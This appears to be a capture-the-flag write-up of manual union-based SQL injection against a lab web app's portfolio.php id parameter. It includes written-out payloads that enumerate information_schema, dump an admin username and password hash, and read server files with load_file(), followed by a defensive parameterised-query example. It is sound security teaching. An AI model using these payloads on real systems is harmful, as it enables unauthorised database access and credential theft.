🟠Web: Freelancer

Exploring SQL injection manually (without sqlmap, just browser and URL)

First step: reconnaissance

At first, I looked at the source code of the page:

Then these HTML comments caught my attention:

So I checked the pages they mention:

  • /portfolio.php?id=1

  • /portfolio.php?id=2

  • /portfolio.php?id=3

It is obvious that these are not separate pages; it's one page whose content changes only according to the number passed in the id parameter.

So I tried a simple SQL injection using "order by" to find out how many columns the query behind "id" returns:

id= 1 order by 1

id= 1 order by 2

id= 1 order by 3

id= 1 order by 4 (we get an error, so the query has only 3 columns)

So we find that the query returns three columns, numbered 1 to 3.

To be able to see the output of our own SQL query, I will use "union select".

To suppress the original row (the result of the first SELECT), I change the 1 to -1 so that only the row from our union is displayed:

id=1 union select 1,2,3

=>

id=-1 union select 1,2,3

Now we can see where columns 2 and 3 of the union select are displayed on the page.

Example:

If we change

id=-1 union select 1,2,3

to

id = -1 union select 1,"gabriel","vernilo"

we get this:

And if we use: id=-1 union select 1," ",@@version

we get the version of the database.

The next part requires some knowledge of how MySQL databases work.

MySQL ships by default with a database called information_schema, which describes every other database, table and column on the server.

Using it we can get the names of the databases:

id=-1 union select 1," ",schema_name from information_schema.schemata

Now we know the databases are: freelancer, information_schema, mysql and performance_schema.

Now I'll try to get the names of the tables inside the "freelancer" database:

id=-1 union select 1," ",table_name from information_schema.tables where table_schema = "freelancer"

Now I will try to see the columns of the safeadmin table inside the freelancer database:

id=-1 union select 1," ",column_name from information_schema.columns where table_schema = "freelancer" and table_name = "safeadmin"

Now I'll try to read the username column:

id=-1 union select 1," ",username from safeadmin

Now we know that the user is safeadm.

Now I'll try to read the password column:

id=-1 union select 1," ",password from safeadmin

What comes back, "$2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K", isn't the admin's password itself;

it's a hash, which I couldn't crack :(

Looking for ideas, I decided to go back to the initial phase, the reconnaissance.

So I fuzzed for more directories and files

and found the file "/administrat/panel.php" (the admin's panel, probably).

In the browser, that page redirects to /administrat/index.php and asks for a login.

So I went back to the portfolio page and read the admin panel's source through the SQL injection, using load_file():

id=-1 union select 1," ",load_file("/var/www/html/administrat/panel.php")

And this shows us the flag.
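To show why every payload above works, and what would have stopped them, here is an added example (not code from the challenge or from this writeup) contrasting a query built by string concatenation with the same query using a bound parameter. The schema is a constructed SQLite stand-in for the challenge's "freelancer" database; the portfolio column names are assumptions, since the page only shows that the query returns three columns.

```python
import sqlite3

# Constructed stand-in for the challenge database (column names are assumed;
# the page only shows that portfolio.php?id=N returns three columns).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE portfolio (id INTEGER, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO portfolio VALUES (?, ?, ?)",
        [(1, "Project 1", "first entry"),
         (2, "Project 2", "second entry"),
         (3, "Project 3", "third entry")],
    )
    con.execute("CREATE TABLE safeadmin (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO safeadmin VALUES (1, 'safeadm', '<hash placeholder>')")
    return con

def lookup_vulnerable(con, raw_id):
    """Builds the statement by concatenation, as portfolio.php evidently does:
    whatever arrives in ?id= becomes part of the SQL text, so 'order by 4',
    'union select ...' and load_file() all run with the application's rights."""
    sql = "SELECT id, title, body FROM portfolio WHERE id = " + raw_id
    return con.execute(sql).fetchall()

def lookup_safe(con, raw_id):
    """Binds ?id= as a parameter: the driver passes it as a value, never as SQL,
    so the statement can only ever be an equality lookup on id. A stricter
    version would also reject anything that is not an integer up front."""
    sql = "SELECT id, title, body FROM portfolio WHERE id = ?"
    return con.execute(sql, (raw_id,)).fetchall()

# The writeup's probe: -1 drops the real row and the UNION supplies the values
# shown in columns 2 and 3 (single quotes here; MySQL accepts "..." by default).
PAYLOAD = "-1 union select 1,'gabriel','vernilo'"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", lookup_vulnerable(con, PAYLOAD))  # attacker's row
    print("safe:      ", lookup_safe(con, PAYLOAD))        # no row at all
```

Run against the same database, the concatenated query returns the attacker-chosen row while the parameterised one returns nothing, because the whole payload is compared as a literal value against the id column.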
